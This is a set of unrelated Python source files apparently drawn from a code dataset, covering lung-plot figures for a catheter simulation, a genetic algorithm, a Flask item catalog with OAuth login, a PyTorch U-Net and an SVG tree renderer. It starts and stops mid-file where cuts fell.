runs\n\n\n def is_transition_point(self, i_run, data_pt):\n dx_desired = self.x_desired[i_run][data_pt + 1, :] - self.x_desired[i_run][data_pt, :]\n if max(abs(dx_desired)) > 0.5:\n return True\n else:\n return False\n\n def plot_lung_cloud(self, \n x_index,\n y_index,\n ax = None,\n color = blue,\n alpha = 0.002,\n slice_index = 2,\n slice_max = 1e3,\n slice_min = -1e3,\n do_slice = False,# pass in reduced lung if wanted\n skip_n = 1): \n if ax is None:\n ax = plt.subplot(111) # create axes at call time; a plt.subplot default argument would be evaluated once and shared across calls\n if do_slice:\n lung = self.lung[(self.lung[:,slice_index] < slice_max) & (self.lung[:,slice_index] > slice_min)]\n else:\n lung = self.lung\n\n ax.plot(lung[::skip_n, x_index], lung[::skip_n, y_index], '.', color = color, alpha = alpha, markersize = 3) \n ax.set_aspect('equal')\n ax.invert_yaxis()\n ax.invert_xaxis()\n sns.despine(ax = ax, top=True, right=True, left=False, bottom=False)\n return ax\n\n def add_on_lung(self, \n ax,\n i_run,\n view = 'xy',\n color = red,\n alpha = 0.5,\n linewidth = 2):\n if view.lower() == 'xy':\n x_index, y_index = 1, 0\n elif view.lower() == 'yz':\n x_index, y_index = 1, 2\n else:\n x_index, y_index = 2, 0\n start_pt = self.indeces[i_run][1]\n end_pt = self.indeces[i_run][-1] #-1 is end of recording, includes after trajec..\n\n x = self.x_sensed[i_run][start_pt:end_pt, x_index]\n y = self.x_sensed[i_run][start_pt:end_pt, y_index]\n line, = ax.plot(x, y, '-', color = color, alpha = alpha, linewidth = linewidth)\n return line\n\n def add_desired_on_lung(self,\n ax,\n i_run,\n view = 'xy',\n color = green,\n alpha = 0.1,\n markersize = 5,\n marker = 's'):\n if view.lower() == 'xy':\n x_index, y_index = 1, 0\n elif view.lower() == 'yz':\n x_index, y_index = 1, 2\n else:\n x_index, y_index = 2, 0\n start_pt = self.indeces[i_run][2]\n end_pt = self.indeces[i_run][-2] #-1 is end of recording, includes after trajec..\n x = self.x_desired[i_run][start_pt:end_pt, x_index]\n y = self.x_desired[i_run][start_pt:end_pt, y_index]\n ax.plot(x, y, '.', marker = marker, color = color, alpha = alpha, markersize = markersize)\n\n\n def make_lung_figure(self, \n fig_width = icra.col_width,\n fig_height = icra.golden_height,\n subplot_left = 0.2, # the left side of the subplots of the figure\n subplot_right = 0.9, # the right side of the subplots of the figure\n subplot_bottom = 0.2, # the bottom of the subplots of the figure\n subplot_top = 0.9, # the top of the subplots of the figure\n subplot_wspace = -.3, # the amount of width reserved for blank space between subplots\n subplot_hspace = -.25, # the amount of height reserved for white space between subplots\n skip_n = 1, # skip n - 1 points when plotting lung dots\n lung_color = blue,\n lung_alpha = 0.0058,\n lung_markersize = 2,\n rasterize_lung = True, # allows pdfs to not save every single point \n rasterize_order = 0, # no idea what this does\n run_colors = [blue, red, grey],\n run_alphas = [0.7, 0.7, 0.7],\n linewidth = 2,\n wp_color = green,\n wp_alpha = 0.8,\n wp_markersize = 4,\n zoom_factor = 1.5,\n bbox_tuple = (0.52, 0.6),\n zoom_limits = (-73, -18, 120, 200),\n legend_bbox = (1.65,1)):\n\n # make figure with subplots\n self.lung_fig = plt.figure(figsize=(fig_width, fig_height)) # w, h in inches\n gs = gridspec.GridSpec(1, 5) \n split = 2#3\n ax_xy = plt.subplot(gs[:, split:])\n ax_xz = plt.subplot(gs[:, :split])\n plt.subplots_adjust(subplot_left, subplot_bottom, subplot_right, subplot_top, subplot_wspace, subplot_hspace)\n \n # XZ subplot\n lung_slice = self.lung[self.lung[:,1] < 0]\n self.plot_lung_on_subplot(ax_xz, \n x_index = 2, \n y_index = 0, \n lung = 
lung_slice, \n skip_n = skip_n, \n lung_color = lung_color, \n lung_alpha = lung_alpha, \n lung_markersize = lung_markersize, \n rasterize_lung = rasterize_lung, \n rasterize_order = rasterize_order,\n hide_axes = [True, True, False, False])# [top, right, left, bottom] \n axes_ticks = [-50, 0, 50]\n axes_ticks_names = ['-50','0','50']\n plt.setp(ax_xz, \n xticks = axes_ticks, \n xticklabels= axes_ticks_names)\n ax_xz.invert_xaxis()\n ax_xz.set_xlabel(icra.axis_labels[2], fontsize = icra.label_fontsize)\n ax_xz.set_ylabel(icra.axis_labels[0], fontsize = icra.label_fontsize)\n\n\n # XY subplot\n self.plot_lung_on_subplot(ax_xy, \n x_index = 1, \n y_index = 0, \n lung = self.lung, \n skip_n = skip_n, \n lung_color = lung_color, \n lung_alpha = lung_alpha, \n lung_markersize = lung_markersize, \n rasterize_lung = rasterize_lung, \n rasterize_order = rasterize_order,\n hide_axes = [True, True, True, False])# [top, right, left, bottom] \n ax_xy.invert_xaxis()\n ax_xy.set_xlabel(icra.axis_labels[1], fontsize = icra.label_fontsize)\n ax_xy.yaxis.set_ticks([])\n\n\n for i_run, run in enumerate(self.run_list):\n self.add_on_lung(ax_xy, i_run, view = 'xy', color = run_colors[i_run], alpha = run_alphas[i_run], linewidth = linewidth)\n self.add_on_lung(ax_xz, i_run, view = 'xz', color = run_colors[i_run], alpha = run_alphas[i_run], linewidth = linewidth)\n # only plottign the first run's desired points. make sure it reached all of them\n self.add_desired_on_lung(ax_xy, i_run = 0, view = 'xy', color = wp_color, alpha = wp_alpha, markersize = wp_markersize)\n self.add_desired_on_lung(ax_xz, i_run = 0, view = 'xz', color = wp_color, alpha = wp_alpha, markersize = wp_markersize)\n\n # zoomed axis\n ax_in = zoomed_inset_axes(ax_xy, \n zoom_factor, # zoom-factor\n loc = 3, # not really sure, picks some location on the fig\n bbox_to_anchor = bbox_tuple, #allows fine tuned position control but not sure what they correspond to...\n bbox_transform = ax_xy.figure.transFigure) # strange command needed for bbox...\n ax_in.invert_xaxis()\n self.plot_lung_on_subplot(ax_in, \n x_index = 1, \n y_index = 0, \n lung = self.lung, \n skip_n = skip_n, \n lung_color = lung_color, \n lung_alpha = lung_alpha, \n lung_markersize = lung_markersize, \n rasterize_lung = rasterize_lung, \n rasterize_order = rasterize_order,\n hide_axes = [False, False, False, False])# [top, right, left, bottom] \n for i_run, run in enumerate(self.run_list):\n self.add_on_lung(ax_in, i_run, view = 'xy', color = run_colors[i_run], alpha = run_alphas[i_run])\n self.add_desired_on_lung(ax_in, i_run = 0, view = 'xy', color = wp_color, alpha = wp_alpha)\n\n x1, x2, y1, y2 = zoom_limits # specify the limits\n ax_in.set_xlim(x1, x2) # apply the x-limits\n ax_in.set_ylim(y1, y2) # apply the y-limits\n ax_in.invert_yaxis()\n ax_in.invert_xaxis()\n ax_in.xaxis.set_ticks([])\n ax_in.yaxis.set_ticks([]) \n # lines from parent to inset\n mark_inset(ax_xy, ax_in, loc1=2, loc2=4, fc=\"none\", ec=\"0.5\")\n\n self.line_labels = ['Way Points'] + self.run_names # for legend\n self.line_handles = [mlines.Line2D([0,0],[0,0], marker = 's', color = wp_color, markersize = wp_markersize, alpha = wp_alpha, linestyle = '')]\n for i_run, run in enumerate(self.run_list):\n line = mlines.Line2D([0,0],[0,0], color = run_colors[i_run], linewidth = linewidth, alpha = run_alphas[i_run])\n self.line_handles.append(line)\n\n plt.legend(handles = self.line_handles, \n labels = self.line_labels,\n loc = 'upper left', \n bbox_to_anchor = legend_bbox,\n fontsize = 
icra.label_fontsize)\n\n return self.lung_fig\n\n\n\n def plot_lung_on_subplot(self, \n ax, \n x_index, \n y_index, \n lung,\n skip_n = 1, # skip n - 1 points when plotting lung dots\n lung_color = blue,\n lung_alpha = 0.0058,\n lung_markersize = 2,\n rasterize_lung = True, # allows pdfs to not save every single point \n rasterize_order = 0,# no idea what this does\n hide_axes = [True, True, False, False]): # [top, right, left, bottom] \n ax.plot(lung[::skip_n, x_index], \n lung[::skip_n, y_index], \n '.', \n color = lung_color, \n alpha = lung_alpha, \n markersize = lung_markersize)\n ax.set_rasterized(rasterize_lung)\n ax.set_rasterization_zorder(rasterize_order)\n ax.tick_params(labelsize=icra.label_fontsize)\n ax.set_xlim(min(lung[:,x_index]), max(lung[:,x_index]))\n ax.set_ylim(min(lung[:,y_index]), max(lung[:,y_index])) \n ax.set_aspect('equal')\n ax.invert_yaxis()\n top, right, left, bottom = hide_axes\n sns.despine(ax = ax, top = top, right = right, left = left, bottom = bottom)\n\n\n def savefig(self, \n dpi = 300, \n file_format = 'pdf', \n file_name = 'test'):\n self.lung_fig.savefig(icra.fig_folder + file_name + '.' + file_format, dpi = dpi)\n\n \n\n \n ","sub_path":"catheter_simulation/data_analysis/lung_plots.py","file_name":"lung_plots.py","file_ext":"py","file_size_in_byte":14375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"326734525","text":"import numpy\ndef cal_pop_fitness(equation_inputs,pop):\n #calculating the fitness value of each solution in the current population\n #the fitness function calculates the sum of products (SOP) between each input and its corresponding weight\n fitness = numpy.sum(pop*equation_inputs,axis=1)\n return fitness\ndef select_mating_pool(pop,fitness,num_parents):\n # Selecting the best individuals in the current generation as parents for producing the offspring of the next generation\n parents = numpy.empty((num_parents,pop.shape[-1]))\n for parent_num in range(num_parents):\n max_fitness_idx = numpy.where(fitness == numpy.max(fitness))\n max_fitness_idx = max_fitness_idx[0][0]\n parents[parent_num,:] = pop[max_fitness_idx,:]\n fitness[max_fitness_idx] = -99999999999\n return parents\ndef crossover(parents,offspring_size):\n offspring = numpy.empty(offspring_size)\n crossover_point = numpy.uint8(offspring_size[1]/2)\n for k in range(offspring_size[0]):\n #index of the first parent to mate\n parent1_idx = k % parents.shape[0]\n #index of the second parent to mate\n parent2_idx = (k+1) % parents.shape[0]\n offspring[k,0:crossover_point] = parents[parent1_idx,0:crossover_point]\n offspring[k,crossover_point:] = parents[parent2_idx,crossover_point:]\n return offspring\n\ndef mutation(offspring_crossover):\n\n #Mutation changes a single gene in each offspring randomly.\n for idx in range(offspring_crossover.shape[0]):\n #The random value to be added to the gene\n random_value = numpy.random.uniform(-1.,1.,1)\n offspring_crossover[idx,4] = offspring_crossover[idx,4]+random_value\n return offspring_crossover\n","sub_path":"ANN_Optimization/ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"479119614","text":"from flask import request, redirect, url_for, render_template, flash\r\nfrom flask import make_response\r\nfrom my_app import app\r\nfrom models import Category, Item\r\nfrom my_app.database_operations import DatabaseOperations\r\nimport jinja2, json, os, httplib2, random, string, 
requests\r\nfrom functools import wraps\r\nfrom flask import session as login_session\r\nfrom my_app.auth.authentication import *\r\nfrom flask_login import LoginManager, UserMixin, login_user, logout_user,\\\r\n current_user\r\n\r\nlm = LoginManager(app)\r\nlm.login_view = 'index'\r\n@lm.user_loader\r\ndef load_user(id):\r\n return db.getUserById(int(id))\r\n\r\ntemplate_directory = os.path.join(os.getcwd(), 'templates')\r\njinja_environment = \\\r\n jinja2.Environment(loader=jinja2.FileSystemLoader(template_directory),\r\n autoescape=True)\r\n\r\ndb = DatabaseOperations()\r\n\r\ndef login_required(f):\r\n @wraps(f)\r\n def login_check(*args, **kwargs):\r\n if not current_user.is_anonymous:\r\n return f(*args, **kwargs)\r\n else:\r\n flash(\"You have to be logged in to access this page\")\r\n return redirect('/login')\r\n return login_check\r\n\r\n\r\n@app.route('/')\r\n@app.route('/index')\r\ndef index():\r\n categories = db.getCategories()\r\n latest_items = db.getLatestItems(10)\r\n cat_items = {}\r\n for item in latest_items:\r\n cat_items[item.title] = db.getCategoryForItem(item)\r\n return render_template('index.html', categories=categories,\r\n latest_items=latest_items, cat_items=cat_items)\r\n\r\n\r\n@app.route('/category/<int:id>')\r\ndef showItems(id):\r\n category = db.getCategoryById(id=id)\r\n if not category:\r\n flash(\"The Category you requested does not exist\")\r\n return redirect('/')\r\n itemCount = db.getNumberOfItemsPerCategory(category.id)\r\n items = db.getItemsForCategory(category.id)\r\n return render_template('items.html', category=category, items=items,\r\n itemCount=itemCount)\r\n\r\n\r\n@app.route('/category/item/<int:id>')\r\ndef item(id):\r\n item = db.getItemById(id=id)\r\n if not item:\r\n flash(\"Item you asked for does not exist.\")\r\n return redirect('/')\r\n categoryName = db.getCategoryForItem(item)\r\n return render_template('item.html', item=item, categoryName=categoryName)\r\n\r\n\r\n\"\"\"\r\n Routes for adding, updating and deleting items\r\n Also a route for signing in as a user\r\n And a route for logging in with third party oauth\r\n\"\"\"\r\n@app.route('/item/add', methods=['GET', 'POST'])\r\n@login_required\r\ndef addItem():\r\n if request.method == 'GET':\r\n categories = db.getCategories()\r\n params = {}\r\n return render_template('newItem.html', categories=categories,\r\n params=params)\r\n if request.method == 'POST':\r\n\r\n title = request.form.get('title')\r\n description = request.form.get('description')\r\n category = request.form.get('category')\r\n\r\n categories = db.getCategories()\r\n params = {'title': title, 'description': description,\r\n 'category': category}\r\n item = item_request(title, description, category, False)\r\n if item is None:\r\n return render_template('newItem.html', categories=categories,\r\n params=params)\r\n if db.addItem(item):\r\n flash(\"Item was added successfully!\")\r\n return redirect('/')\r\n else:\r\n flash(\"Something went wrong adding item.\")\r\n return render_template('newItem.html', categories=categories,\r\n params=params)\r\n\r\n\r\ndef item_request(title, description, category, edit):\r\n \"\"\"\r\n This is a helper method for both adding and\r\n editing an item, so there is no duplicate code.\r\n \"\"\"\r\n creator_id = current_user.social_id\r\n categories = db.getCategories()\r\n params = {'title': title, 'description': description,\r\n 'category': category}\r\n\r\n if not title:\r\n flash(\"A title is required.\")\r\n return None\r\n\r\n if not description:\r\n flash(\"A description is 
required.\")\r\n return None\r\n\r\n existingCategories = db.getExistingCategories()\r\n if int(category) not in existingCategories:\r\n flash(\"This is a non existing category.\")\r\n return None\r\n\r\n # title must be unique in this category but not for editing.\r\n if not edit:\r\n titles = db.getCategoryTitles(category)\r\n if title in titles:\r\n flash(\"Existing title in this category: try another title.\")\r\n return None\r\n\r\n if not creator_id:\r\n flash(\"Sorry, the session could not find logged in user.\")\r\n return None\r\n\r\n item = Item(title, description, category, creator_id)\r\n return item\r\n\r\n\r\n@app.route('/category/item/<int:id>/delete', methods=['GET', 'POST'])\r\n@login_required\r\ndef deleteItem(id):\r\n\r\n item = db.getItemById(id=id)\r\n # check existence before touching item attributes\r\n if not item:\r\n flash('This item does not exist.')\r\n return redirect('/')\r\n user_id = current_user.social_id\r\n\r\n if item.creator != user_id:\r\n flash(\"Sorry you have to be the creator of an item to delete it.\")\r\n return redirect('/')\r\n\r\n if request.method == 'GET':\r\n return render_template('deleteItem.html', item=item)\r\n if request.method == 'POST':\r\n if request.form.get('action') != \"Yes Delete\":\r\n return redirect('/')\r\n user = current_user\r\n if db.deleteItem(item.id, user):\r\n flash(\"The item has been deleted successfully.\")\r\n else:\r\n flash(\"The item could not be deleted.\")\r\n return redirect('/')\r\n\r\n\r\n# you need to be logged in\r\n@app.route('/item/<int:id>/edit', methods=['GET', 'POST'])\r\n@login_required\r\ndef editItem(id):\r\n item = db.getItemById(id=id)\r\n params = {}\r\n # check existence before checking ownership\r\n if not item:\r\n flash('This item does not exist')\r\n return redirect('/')\r\n creator = db.getItemCreator(id=id)\r\n user_id = current_user.social_id\r\n\r\n if creator != user_id:\r\n flash(\"Sorry you need to be the creator of an item to edit it\")\r\n return redirect('/')\r\n\r\n if request.method == 'GET':\r\n # present a form for editing items\r\n categories = db.getCategories()\r\n return render_template('editItem.html', categories=categories,\r\n params=params, item=item)\r\n\r\n if request.method == 'POST':\r\n\r\n title = request.form.get('title')\r\n description = request.form.get('description')\r\n category = request.form.get('category')\r\n categories = db.getCategories()\r\n\r\n params = {'title': title, 'description': description,\r\n 'category': category}\r\n\r\n new_item = item_request(title, description, category, True)\r\n\r\n if not new_item:\r\n flash(\"Item could not be updated.\")\r\n return render_template('editItem.html', categories=categories,\r\n params=params, item=item)\r\n\r\n if db.updateItem(item.id, new_item, current_user):\r\n flash(\"Successfully edited item.\")\r\n return redirect('/')\r\n return render_template('editItem.html', categories=categories,\r\n params=params, item=item)\r\n\r\n\r\n@app.route('/categories.json/')\r\ndef categoriesJson():\r\n categories = db.getSerializedCategories()\r\n return categories\r\n\r\n\r\n@app.route('/category/<int:id>/items.json/')\r\ndef itemsJson(id):\r\n items = db.getSerializedItemsForCategory(id)\r\n return items\r\n\r\n\r\n@app.route('/category/item/<int:id>/item.json/')\r\ndef itemJson(id):\r\n item = db.getSerializedItem(id)\r\n return item\r\n\r\n\r\n@app.route('/login')\r\ndef login():\r\n # Create anti-forgery state token\r\n state = ''.join(random.choice(string.ascii_uppercase + string.digits)\\\r\n for x in xrange(32))\r\n login_session['state'] = state\r\n return render_template('login.html', 
STATE=state)\r\n\r\n\r\n@app.route('/logout')\r\ndef logout():\r\n logout_user()\r\n return redirect(url_for('index'))\r\n\r\n\r\n@app.route('/authorize/<provider>')\r\ndef oauth_authorize(provider):\r\n if not current_user.is_anonymous:\r\n return redirect(url_for('index'))\r\n oauth = OAuthSignIn.get_provider(provider)\r\n return oauth.authorize()\r\n\r\n\r\n@app.route('/callback/<provider>')\r\ndef oauth_callback(provider):\r\n if not current_user.is_anonymous:\r\n return redirect(url_for('index'))\r\n oauth = OAuthSignIn.get_provider(provider)\r\n social_id, username, email = oauth.callback()\r\n if social_id is None:\r\n flash('Authentication failed.')\r\n return redirect(url_for('index'))\r\n user = db.getUserBySocialId(social_id=social_id)\r\n if not user:\r\n user = db.addUser(social_id=social_id, name=username, email=email)\r\n login_user(user, True)\r\n flash('logged in with: ' + provider + ' as ' + username)\r\n return redirect(url_for('index'))\r\n","sub_path":"my_app/catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"599142733","text":"#!/usr/bin/env python\nfrom sys import version_info\nfrom setuptools import setup, find_packages\n\ntests_require = ['mock']\n\nif version_info < (2, 7):\n tests_require.append('unittest2')\n\nsetup(name='gevent-kafka',\n version='0.3.1',\n description='Apache Kafka bindings for Gevent',\n author='Johan Rydberg',\n author_email='johan.rydberg@gmail.com',\n url='https://github.com/edgeware/gevent-kafka',\n packages=find_packages(),\n test_suite='gevent_kafka.test',\n install_requires=[\n 'gevent>=1.0.1',\n 'kazoo>=1.3.1'\n ],\n tests_require=tests_require)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"541155241","text":"\"\"\"\nThis is based on:\n https://github.com/facebookresearch/fastMRI\n\"\"\"\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom pyssr.core.config import cfg\n\n\nclass ConvBlock(nn.Module):\n \"\"\"\n A Convolutional Block that consists of two convolution layers each followed by\n instance normalization, LeakyReLU activation and dropout.\n \"\"\"\n\n def __init__(self, in_chans, out_chans, drop_prob):\n \"\"\"\n Args:\n in_chans (int): Number of channels in the input.\n out_chans (int): Number of channels in the output.\n drop_prob (float): Dropout probability.\n \"\"\"\n super().__init__()\n\n self.in_chans = in_chans\n self.out_chans = out_chans\n self.drop_prob = drop_prob\n\n self.layers = nn.Sequential(\n nn.Conv2d(in_chans, out_chans, kernel_size=3, padding=1, bias=False),\n nn.InstanceNorm2d(out_chans),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n nn.Dropout2d(drop_prob),\n nn.Conv2d(out_chans, out_chans, kernel_size=3, padding=1, bias=False),\n nn.InstanceNorm2d(out_chans),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n nn.Dropout2d(drop_prob)\n )\n\n def forward(self, input):\n \"\"\"\n Args:\n input (torch.Tensor): Input tensor of shape [batch_size, self.in_chans, height, width]\n Returns:\n (torch.Tensor): Output tensor of shape [batch_size, self.out_chans, height, width]\n \"\"\"\n return self.layers(input)\n\n def __repr__(self):\n return f'ConvBlock(in_chans={self.in_chans}, out_chans={self.out_chans}, ' \\\n f'drop_prob={self.drop_prob})'\n\n\nclass TransposeConvBlock(nn.Module):\n \"\"\"\n A Transpose 
Convolutional Block that consists of one convolution transpose layers followed by\n instance normalization and LeakyReLU activation.\n \"\"\"\n\n def __init__(self, in_chans, out_chans):\n \"\"\"\n Args:\n in_chans (int): Number of channels in the input.\n out_chans (int): Number of channels in the output.\n \"\"\"\n super().__init__()\n\n self.in_chans = in_chans\n self.out_chans = out_chans\n\n self.layers = nn.Sequential(\n nn.ConvTranspose2d(in_chans, out_chans, kernel_size=2, stride=2, bias=False),\n nn.InstanceNorm2d(out_chans),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n )\n\n def forward(self, input):\n \"\"\"\n Args:\n input (torch.Tensor): Input tensor of shape [batch_size, self.in_chans, height, width]\n Returns:\n (torch.Tensor): Output tensor of shape [batch_size, self.out_chans, height, width]\n \"\"\"\n return self.layers(input)\n\n def __repr__(self):\n return f'ConvBlock(in_chans={self.in_chans}, out_chans={self.out_chans})'\n\n\nclass UNet(nn.Module):\n \"\"\"\n PyTorch implementation of a U-Net model.\n This is based on:\n Olaf Ronneberger, Philipp Fischer, and Thomas Brox. U-net: Convolutional networks\n for biomedical image segmentation. In International Conference on Medical image\n computing and computer-assisted intervention, pages 234–241. Springer, 2015.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Args:\n in_chans (int): Number of channels in the input to the U-Net model.\n out_chans (int): Number of channels in the output to the U-Net model.\n num_chans (int): Number of output channels of the first convolution layer.\n num_pools (int): Number of down-sampling and up-sampling layers.\n drop_prob (float): Dropout probability.\n \"\"\"\n super().__init__()\n\n in_chans = cfg.MODEL.IN_CHANNELS\n out_chans = cfg.MODEL.IN_CHANNELS\n num_chans = cfg.UNET.NUM_CHANS\n num_pools = cfg.UNET.NUM_POOLS\n drop_prob = cfg.UNET.DROP_PROB\n\n self.in_chans = in_chans\n self.out_chans = out_chans\n self.num_chans = num_chans\n self.num_pools = num_pools\n self.drop_prob = drop_prob\n\n self.down_sample_layers = nn.ModuleList([ConvBlock(in_chans, num_chans, drop_prob)])\n ch = num_chans\n for i in range(num_pools - 1):\n self.down_sample_layers += [ConvBlock(ch, ch * 2, drop_prob)]\n ch *= 2\n self.conv = ConvBlock(ch, ch * 2, drop_prob)\n\n self.up_conv = nn.ModuleList()\n self.up_transpose_conv = nn.ModuleList()\n for i in range(num_pools - 1):\n self.up_transpose_conv += [TransposeConvBlock(ch * 2, ch)]\n self.up_conv += [ConvBlock(ch * 2, ch, drop_prob)]\n ch //= 2\n\n self.up_transpose_conv += [TransposeConvBlock(ch * 2, ch)]\n self.up_conv += [\n nn.Sequential(\n ConvBlock(ch * 2, ch, drop_prob),\n nn.Conv2d(ch, self.out_chans, kernel_size=1, stride=1),\n )]\n\n def forward(self, input):\n \"\"\"\n Args:\n input (torch.Tensor): Input tensor of shape [batch_size, self.in_chans, height, width]\n Returns:\n (torch.Tensor): Output tensor of shape [batch_size, self.out_chans, height, width]\n \"\"\"\n mean = input.detach().mean(dim=(2, 3), keepdim=True)\n output = input - mean\n stack = []\n\n # Apply down-sampling layers\n for i, layer in enumerate(self.down_sample_layers):\n output = layer(output)\n stack.append(output)\n output = F.avg_pool2d(output, kernel_size=2, stride=2, padding=0)\n\n output = self.conv(output)\n\n # Apply up-sampling layers\n for transpose_conv, conv in zip(self.up_transpose_conv, self.up_conv):\n downsample_layer = stack.pop()\n output = transpose_conv(output)\n\n # Reflect pad on the right/bottom if needed to handle odd input dimensions.\n 
padding = [0, 0, 0, 0]\n if output.shape[-1] != downsample_layer.shape[-1]:\n padding[1] = 1 # Padding right\n if output.shape[-2] != downsample_layer.shape[-2]:\n padding[3] = 1 # Padding bottom\n if sum(padding) != 0:\n output = F.pad(output, padding, \"reflect\")\n\n output = torch.cat([output, downsample_layer], dim=1)\n output = conv(output)\n\n return output + mean\n\n @staticmethod\n def complexity(cx):\n return cx\n","sub_path":"pyssr/models/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":6465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"540658412","text":"import threading\nimport time\n# the main thread and the workers share the global variable; it is passed to the workers by value\ng_num=100\ndef worker1(num):\n\tfor i in range(3):\n\t\tnum+=1\n\t\tprint('in worker1 g_num:%d'%num)\n\ndef worker2(num):\n\tprint('in worker2 g_num:%d'%num)\n\nprint('main thread, g_num:%d'%g_num)\n\nw1=threading.Thread(target=worker1,args=(g_num,))\nw1.start()\ntime.sleep(1)\n\nw2=threading.Thread(target=worker2,args=(g_num,))\nw2.start()\nprint('main thread, g_num:%d'%g_num)\n","sub_path":"python/Day9/10-线程传参2.py","file_name":"10-线程传参2.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"326401854","text":"import svgwrite\nimport os\n\nclass TreeRenderer(object):\n def __init__(self):\n self.start_x = 0\n self.start_y = 0\n self.scale_x = 24\n self.scale_y = 24\n self.scale_th = 24\n self.font_family = \"Futura\"\n self.font_size = 0.3\n self.document = None\n self.font_baseline_shift = +0.05\n self.stroke_width = 0.05\n self.horizontal_gap = 0.05\n self.min_x = 10000\n self.min_y = 10000\n self.max_x = -10000\n self.max_y = -10000\n\n self.shift_x = 0\n self.shift_y = 0\n self.height = 0\n self.width = 0\n\n self.obj = list()\n self.margin = 0\n self.zoom = 1.0\n\n def __getattr__(self, item):\n if item in ['block', 'shade', 'v_connection', 'h_connection', 'label']:\n # This will delay the execution of the draw commands until we know where to draw\n return self._delay(object.__getattribute__(self, 'draw_' + item))\n else:\n return object.__getattribute__(self, item)\n\n\n def _delay(self, func):\n def wrapper(*args, **kwargs):\n def fnc():\n return func(*args, **kwargs)\n\n return fnc\n\n return wrapper\n\n def add(self, obj):\n self.obj.append(obj)\n\n def pre(self, obj):\n self.obj.insert(0, obj)\n\n def _x(self, x):\n return self.start_x + self._w(x - self.shift_x)\n\n def _y(self, y):\n return self.start_y + self._h(y + self.shift_y)\n\n def _w(self, y):\n return self.scale_x * self.zoom * y\n\n def _h(self, y):\n return self.scale_y * self.zoom * y\n\n def _th(self, th):\n return self.scale_th * self.zoom * th\n\n def _xy(self, x, y):\n return (self._x(x), self._y(y))\n\n def _wh(self, w, h):\n return (self._w(w), self._h(h))\n\n def _xb(self, x, y):\n return (self._x(x), self._y(y + self.font_baseline_shift))\n\n\n def _pad(self, xy, wh):\n self.min_x = min(self.min_x, xy[0], xy[0] + wh[0])\n self.min_y = min(self.min_y, xy[1], xy[1] + wh[1])\n self.max_x = max(self.max_x, xy[0] + wh[0], xy[0])\n self.max_y = max(self.max_y, xy[1] + wh[1], xy[1])\n\n def draw_block(self, x,y, color = \"blue\", text = \"\", align=\"middle\", extend_right= True, extend_left = True, padding=None):\n document = self.document\n if padding is None:\n padding = self.horizontal_gap\n\n self._pad(self._xy(x - 0.5, y - 0.3), self._wh(1.0, 0.6))\n\n ret = []\n\n ret.append(document.rect(\n insert = self._xy(x - 0.5 + padding, y - 0.3),\n size = 
self._wh(1.0 - 2 * padding, 0.6),\n fill = color,\n ))\n if extend_left:\n ret.append(document.circle(\n center = self._xy(x - 0.5, y),\n r = self._w(padding),\n stroke_width = 0,\n stroke = color,\n fill = color\n ))\n if extend_right:\n ret.append(document.circle(\n center = (self._xy(x + 0.5, y)),\n r = self._w( padding),\n stroke_width = 0,\n stroke = color,\n fill = color\n ))\n ret.append(document.text(\n text = str(text)[:4],\n insert = self._xb(x, y),\n text_anchor = align,\n font_size = self._h(self.font_size),\n alignment_baseline = 'middle',\n font_family = self.font_family,\n fill = 'white'\n ))\n\n return ret\n\n def draw_shade(self, x, y, w, color, stroke_width = None):\n document = self.document\n if stroke_width is None:\n stroke_width = self.stroke_width\n\n self._pad(self._xy(x - 0.5, y - 0.35), self._wh(1.0, 0.7))\n\n return [document.rect(\n insert = self._xy(x - 0.5, y + 0.35),\n size = self._wh(w, 0.1),\n fill = color,\n stroke = color,\n stroke_width = self._th(stroke_width)\n )]\n\n def draw_shade_alt(self, x, y, w, color, stroke_width = None):\n document = self.document\n if stroke_width is None:\n stroke_width = self.stroke_width\n\n self._pad(self._xy(x - 0.5, y - 0.35), self._wh(1.0, 0.7))\n\n return [document.rect(\n insert = self._xy(x - 0.5, y - 0.35),\n size = self._wh(w, 0.7),\n fill = 'none',\n stroke = color,\n stroke_width = self._th(stroke_width)\n )]\n\n def draw_v_connection(self, x, y1, y2, color, stroke_width = None, padding = None):\n document = self.document\n if stroke_width is None:\n stroke_width = self.stroke_width\n if padding is None:\n padding = self.horizontal_gap\n\n self._pad(self._xy(x - 0.5 - stroke_width, y1), self._wh(2 * stroke_width, y2-y1))\n\n return [document.line(\n start = self._xy(x - 0.5, y1 + padding),\n end = self._xy(x - 0.5, y2 - padding),\n stroke_width = self._th(stroke_width),\n stroke = color,\n )]\n\n def draw_h_connection(self, x1, x2, y, color, stroke_width = None, padding = None):\n document = self.document\n if stroke_width is None:\n stroke_width = self.stroke_width\n if padding is None:\n padding = self.horizontal_gap\n\n self._pad(self._xy(x1, y - stroke_width), self._wh(x2-x1, 2 * stroke_width))\n\n return [document.line(\n start = self._xy(x1 + 0.5 + padding, y),\n end = self._xy(x2 - 0.5, y),\n stroke_width = self._th(stroke_width),\n stroke = color,\n )]\n\n def _text_align_to_int(self, s):\n if s == \"start\":\n return 1\n elif s == \"end\":\n return -1\n else:\n return 0\n\n def draw_label(self, x, y, w, text, align = \"middle\", color = \"black\", shift = 0.7):\n document = self.document\n\n self._pad(\n self._xy(x + shift * self._text_align_to_int(align), y),\n self._wh(w * self._text_align_to_int(align), 0.6)\n )\n\n return [document.text(\n text = str(text),\n insert = self._xb(x + shift * self._text_align_to_int(align), y),\n text_anchor = align,\n font_size = self._h(self.font_size),\n alignment_baseline = 